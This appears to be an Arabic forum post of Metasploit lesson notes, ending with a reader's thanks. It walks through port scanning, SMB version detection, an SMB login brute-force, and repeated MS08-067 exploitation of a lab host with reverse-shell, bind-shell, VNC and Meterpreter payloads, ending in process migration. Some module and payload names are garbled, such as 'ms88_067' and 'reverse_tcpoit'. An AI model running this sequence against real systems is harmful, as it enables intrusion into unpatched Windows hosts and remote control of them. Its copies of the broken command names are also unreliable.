.
search portscan
use scanner/portscan/tcp
show options
set rhosts 192.168.1.102
run
الدرس الثاني
use scanner/smb/version
show options
set RHOST 192.168.1.102
run
الدرس الثالث
show auxiliary
use scanner/smb/login
show options
set RHOSTS 192.168.1.0-10
set SMBUser pentest
run
إنتهى
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/shell/reverهذا الأمر يمكن بدل reverse الأخير
show options
set RHOST 192.168.1.3
exploit
الإقتحام
ipconfig
الدرس الي بعدو
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/shell/bind
show options
exploit
ipconfig
الدرس الذي يليه
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/vncinject/reverse_tcp
show options
set lHOST 192.168.1.103
exploit
تم الأقتحام
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/meterpreter/reverse_tcpoit
show options
set lHOST 192.168.1.103
exploit
help
ps
meterpreter >>migrate 1544
أخي الحبيب بوركت بجد وجزيل الشكر على الدروس والخلاصة منهم انا بكمل دروسك وبرجع بأستفسارات معينة
ان شاء الله